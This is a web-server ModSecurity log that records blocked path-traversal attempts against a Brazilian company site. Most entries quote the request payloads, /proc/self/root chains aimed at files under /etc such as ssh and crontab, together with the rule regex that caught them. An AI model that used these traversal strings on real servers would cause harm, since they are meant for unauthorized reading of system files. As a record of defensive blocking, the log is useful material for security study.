[Mon Mar 16 12:43:26.881225 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:54164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglHo6lpbStxTqkSktsHAAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:43:39.582867 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.243.203:36654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglKxXjF1vJNtV6CWr1sQAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:43:45.304950 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.243.203:58684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglMbysWC90G-1nBrBE6QAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:43:47.736173 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:58698] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglM7ABkC4fWIHEf8Hp1gAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:43:50.552977 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:58712] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglNv9ocpUE4ed4uDzu4QAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:43:58.280224 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.243.203:44320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglPglT9VtDQc7bgUyxeAAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:43:59.576266 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.243.203:44332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglP3bQATo66fKoS7xPUwAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:44:00.765884 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:51330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglQHbQATo66fKoS7xPVAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:44:03.079122 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:51346] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglQ7ABkC4fWIHEf8Hp2gAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:45:10.613646 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.243.203:51348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglhrysWC90G-1nBrBFJwAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:45:16.384895 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.243.203:39058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgljJqj1wV0Si-Okeft-gAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:45:17.691037 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.243.203:39072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgljXbQATo66fKoS7xPZgAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:45:28.437327 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:39074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abglmLysWC90G-1nBrBFMgAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:46:27.902281 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:47584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgl0rABkC4fWIHEf8HqkAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:46:43.570727 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.228.16:45932] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgl4glT9VtDQc7bgUyxvAAAARg"]
[Mon Mar 16 12:47:31.415099 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:43688] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmEwlT9VtDQc7bgUyx-QAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:48:05.068265 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:55218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmNQlT9VtDQc7bgUyyHgAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:48:43.689505 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:36214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmW9SswJuvopo3lOhfSgAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:49:00.123633 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.244.31:41684] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgmbNSswJuvopo3lOhfSwAAAJc"]
[Mon Mar 16 12:49:40.429701 2026] [:error] [pid 10709:tid 140411716749056] [client 74.7.241.46:39290] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmlBXjF1vJNtV6CWr2hQAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:50:12.572650 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:33238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmtLysWC90G-1nBrBFlgAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:50:18.331127 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:47254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmupqj1wV0Si-OkefueQAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:50:18.398871 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:38336] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmunbQATo66fKoS7xPxAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
